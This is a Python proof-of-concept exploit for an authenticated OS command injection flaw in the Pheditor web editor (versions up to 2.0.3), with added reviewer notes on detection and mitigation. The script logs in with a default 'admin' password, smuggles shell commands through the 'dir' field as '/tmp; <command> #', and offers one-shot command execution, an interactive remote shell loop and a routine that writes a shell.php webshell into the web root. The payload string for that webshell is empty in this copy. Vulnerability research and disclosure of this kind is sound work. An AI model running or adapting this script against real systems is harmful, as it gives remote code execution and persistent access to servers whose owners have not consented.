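#!/usr/bin/env python3
"""
CVE-2026-48030 - OS Command Injection in Pheditor
Affected: pheditor <= 2.0.3
Fixed: pheditor >= 2.0.4
Author: Muslimbek Burxonov

Reviewer notes, based on the requests this script sends:

Request flow
  1. POST ``pheditor_password`` to the editor URL. A valid password is
     required, so this is an authenticated issue; the script falls back to
     "admin" when no password is given.
  2. GET the editor page and read the ``token = "<hex>"`` value from the HTML.
  3. POST ``action=terminal`` with ``command=ls`` and the injected text in
     ``dir``, formatted as ``/tmp; <command> #``.

The injected text travels in ``dir``, not in ``command``. Presumably the
server places ``dir`` into a shell command line without escaping it; confirm
against the change shipped in 2.0.4.

Detection
  - POST bodies with ``action=terminal`` whose ``dir`` value contains ``;``,
    ``#`` or other shell metacharacters.
  - A new ``shell.php`` beside the editor script, or GET requests to
    ``shell.php?c=...``.
  - The web server account spawning ``id`` or other unexpected processes.
  - User-Agent exactly ``Mozilla/5.0`` (weak indicator, trivially changed).

Mitigation
  - Upgrade to pheditor >= 2.0.4.
  - Replace the default editor password and restrict network access to the
    editor URL.
  - Disable the terminal feature where the deployment does not need it.
"""

import argparse
import re
import sys

import requests

# NOTE(review): every request below uses verify=False, so the editor password
# and session token travel over a connection whose certificate is never
# checked; this call only hides the resulting warnings.
requests.packages.urllib3.disable_warnings()

# NOTE(review): the source this was recovered from had its whitespace
# collapsed; the row breaks below are restored, the column alignment is not.
BANNER = """
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗ ╚════██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ ╚════██╗
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ██╔╝
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝ ╚════╝
CVE-2026-48030 | OS Command Injection | Pheditor <= 2.0.3
Author: Muslimbek Burxonov
"""


def get_token(session, target):
    """Fetch the editor page and return the hex token embedded in it.

    Exits the process with status 1 when no ``token = "<hex>"`` assignment is
    found in the response body, which the script treats as a failed login.
    """
    resp = session.get(target, verify=False, timeout=10)
    match = re.search(r'token = "([a-f0-9]+)"', resp.text)
    if not match:
        print("[-] Token olinmadi — login muvaffaqiyatsiz")
        sys.exit(1)
    return match.group(1)


def login(session, target, password):
    """Submit the editor password and exit with status 1 on failure.

    Success is inferred from the presence of ``token = "`` in the response
    body, not from the HTTP status code.
    """
    resp = session.post(
        target,
        data={"pheditor_password": password},
        allow_redirects=True,
        verify=False,
        timeout=10,
    )
    if 'token = "' not in resp.text:
        print("[-] Login muvaffaqiyatsiz — parol noto'g'ri")
        sys.exit(1)
    print("[+] Login: OK")


def execute(session, target, token, command):
    """Send one ``action=terminal`` request and return the text it yields.

    The ``command`` field is always the fixed string ``ls``; the caller's
    text is carried in ``dir`` as ``/tmp; <command> #``. Returns the stripped
    ``dir`` or ``result`` member of the JSON reply, or an empty string when
    the reply is not usable JSON.
    """
    # Request shape worth matching on the defensive side: a terminal action
    # whose ``dir`` value contains ';' and ends in '#'.
    injection = f"/tmp; {command} #"
    data = {
        "action": "terminal",
        "token": token,
        "command": "ls",
        "dir": injection,
    }
    resp = session.post(target, data=data, verify=False, timeout=15)
    try:
        result = resp.json()
        output = result.get("dir") or result.get("result") or ""
        return output.strip()
    except (ValueError, AttributeError):
        # ValueError: body is not JSON. AttributeError: JSON is not an object
        # or the member is not a string. Anything else should surface rather
        # than be reported as empty output.
        return ""


def check_vulnerability(session, target, token):
    """Run ``id`` through ``execute`` and report whether ``uid=`` came back.

    Returns True when the output contains ``uid=``, False otherwise.
    """
    print("[*] Zaiflik tekshirilmoqda...")
    output = execute(session, target, token, "id")
    if "uid=" in output:
        print(f"[+] ZAIFLIK TASDIQLANDI: {output}")
        return True
    print("[-] Zaiflik topilmadi — patch qo'llangan bo'lishi mumkin")
    return False


def interactive_shell(session, target):
    """Read commands from stdin and pass each one to ``execute``.

    A fresh token is fetched before every command. The loop ends on the
    literal input ``exit`` or on Ctrl-C.
    """
    print("\n[+] Interactive shell — 'exit' yozing chiqish uchun\n")
    while True:
        try:
            cmd = input("pheditor$ ").strip()
            if not cmd:
                continue
            if cmd.lower() == "exit":
                print("[*] Chiqilmoqda...")
                break
            token = get_token(session, target)
            output = execute(session, target, token, cmd)
            print(output if output else "(bo'sh natija)")
        except KeyboardInterrupt:
            print("\n[*] Chiqilmoqda...")
            break


def deploy_webshell(session, target, token, webroot):
    """Write ``shell.php`` under *webroot* and probe it with ``?c=id``.

    The artefact is a file named ``shell.php`` in the web root, followed by a
    GET to ``shell.php?c=id`` in the same directory as the editor URL;
    file-integrity monitoring on the web root and access-log review cover
    both steps.
    """
    print(f"[*] Webshell joylashtirilmoqda: {webroot}/shell.php")
    # NOTE(review): shell_code is an empty string in this copy of the script.
    shell_code = ""
    cmd = f"echo '{shell_code}' > {webroot}/shell.php"
    execute(session, target, token, cmd)

    shell_url = target.rsplit("/", 1)[0] + "/shell.php"
    resp = session.get(f"{shell_url}?c=id", verify=False, timeout=10)
    if "uid=" in resp.text:
        print("[+] Webshell muvaffaqiyatli joylashtirildi!")
        print(f"[+] URL: {shell_url}?c=COMMAND")
        print(f"[+] Test: {resp.text.strip()}")
    else:
        print("[-] Webshell joylashtirilmadi")


def main():
    """Parse arguments, log in, run the check, then dispatch the chosen mode."""
    print(BANNER)
    parser = argparse.ArgumentParser(
        description="CVE-2026-48030 PoC — Pheditor OS Command Injection"
    )
    parser.add_argument("--target", required=True,
                        help="Target URL (e.g. http://target/pheditor.php)")
    parser.add_argument("--password", default="admin",
                        help="Pheditor password (default: admin)")
    parser.add_argument("--cmd", help="Bajarish uchun bitta buyruq")
    parser.add_argument("--webshell",
                        help="Webshell uchun webroot yo'li (e.g. /var/www/html)")
    parser.add_argument("--shell", action="store_true",
                        help="Interactive shell oching")
    args = parser.parse_args()

    session = requests.Session()
    session.headers.update({"User-Agent": "Mozilla/5.0"})

    print(f"[*] Target: {args.target}")
    # The password is no longer echoed: terminal scrollback, CI logs and
    # report attachments would otherwise capture the credential in cleartext.
    print("[*] Parol: ********\n")

    # Login
    login(session, args.target, args.password)

    # Token
    token = get_token(session, args.target)
    print(f"[+] CSRF Token: {token[:16]}...")

    # Vulnerability check
    if not check_vulnerability(session, args.target, token):
        sys.exit(1)

    # Mode selection
    if args.cmd:
        token = get_token(session, args.target)
        output = execute(session, args.target, token, args.cmd)
        print(f"\n[+] Natija:\n{output}")
    elif args.webshell:
        token = get_token(session, args.target)
        deploy_webshell(session, args.target, token, args.webshell)
    elif args.shell:
        interactive_shell(session, args.target)
    else:
        print("\n[*] Qo'shimcha flaglar:")
        print(" --cmd 'whoami' — bitta buyruq")
        print(" --shell — interactive shell")
        print(" --webshell /var/www/html — webshell joylashtirish")


if __name__ == "__main__":
    main()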